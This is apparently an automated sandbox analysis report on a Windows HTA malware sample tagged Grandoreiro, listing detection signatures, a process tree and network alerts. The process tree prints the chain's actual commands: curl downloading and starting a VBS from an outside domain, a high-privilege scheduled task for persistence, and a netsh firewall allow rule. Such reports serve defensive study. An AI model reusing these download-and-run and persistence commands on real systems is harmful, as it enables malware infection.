Edit tour
Windows
Analysis Report
#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta
Overview
General Information
| Sample name: | #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.htarenamed because original name is a hash value |
| Original sample name: | processo_.hta |
| Analysis ID: | 1546870 |
| MD5: | ee585baf8691b05445c29031468a4f89 |
| SHA1: | 864cd480834007a3ec9bb4d36851030bc9317c34 |
| SHA256: | 882df8937c7fb3cbfd576a5d335df42a78821c8e26b1d0f88e4f4bac46ab064f |
| Tags: | geoGrandoreirohtaMEXPRTuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Modifies the windows firewall
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
mshta.exe (PID: 7088 cmdline: mshta.exe "C:\Users\ user\Deskt op\#U2749p rocesso#U2 749_#U2464 #U2461#U24 67#U2465#U 2462#U2463 #U2467#U24 61.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
cmd.exe (PID: 1460 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6724f9 1d7b54a.vb s https:// processoec onsulta.on line/6724f 91d7b3cb/6 724f91d7b5 4a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5744 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 6064 cmdline: curl -k -o C:\Users\ Public\672 4f91d7b54a .vbs https ://process oeconsulta .online/67 24f91d7b3c b/6724f91d 7b54a.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4456 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724f91d7b5 4a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 3064 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724f91d7 b54a.vbs" MD5: FF00E0480075B095948000BDC66E81F0) 
CSRPS.exe (PID: 5052 cmdline: "C:\_6724f 91d7b3cb\C SRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - schtasks.exe (PID: 5852 cmdline:
SCHTASKS / Query /TN "CSRPS" MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 2140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5552 cmdline:
"C:\Window s\System32 \cmd.exe" /C SCHTASK S /Create /F /RL HIG HEST /TN " CSRPS" /TR "C:\_6724 f91d7b3cb\ CSRPS.exe" /SC ONLOG ON /DELAY 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5776 cmdline:
SCHTASKS / Create /F /RL HIGHES T /TN "CSR PS" /TR "C :\_6724f91 d7b3cb\CSR PS.exe" /S C ONLOGON /DELAY 000 1:00 MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 2120 cmdline:
"C:\Window s\System32 \cmd.exe" /C netsh a dvfirewall firewall add rule n ame="CSRPS " dir=in a ction=allo w program= "C:\_6724f 91d7b3cb\C SRPS.exe" enable=yes profile=a ny MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 6176 cmdline:
netsh advf irewall fi rewall add rule name ="CSRPS" d ir=in acti on=allow p rogram="C: \_6724f91d 7b3cb\CSRP S.exe" ena ble=yes pr ofile=any MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - cmd.exe (PID: 2472 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4564 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5164 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7704 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7992 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 5852 cmdline:
cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 6500 cmdline:
ipconfig / flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - cmd.exe (PID: 1068 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2312 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7564 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7900 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 8124 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - cmd.exe (PID: 3544 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 4364 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7556 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7908 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 5296 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7384 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7748 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7972 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - CSRPS.exe (PID: 2120 cmdline:
C:\_6724f9 1d7b3cb\CS RPS.exe MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - cmd.exe (PID: 6008 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7404 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7732 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8000 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 3608 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7420 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7860 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6528 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7368 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7840 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4040 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7548 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7936 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6860 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7412 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7776 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8096 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7232 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 7396 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 7804 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 8032 cmdline:
taskkill / f /im CSRP S.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 7376 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 4f91d7b3cb \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 6416 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 724f91d7b5 4a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 2852 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6724f91d7 b54a.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |   |
|---|
| Source: | Author: Jonathan Cheong, oscd.community: | ||
| Source: | Author: Jonathan Cheong, oscd.community: | ||
| Source: | Author: frack113, Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-01T16:57:16.448567+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49741 | TCP |
| 2024-11-01T16:58:08.387650+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49755 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Binary or memory string: | memstr_23ceda6c-8 | |
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 12_2_6F8DC2D0 | |
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Process created: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||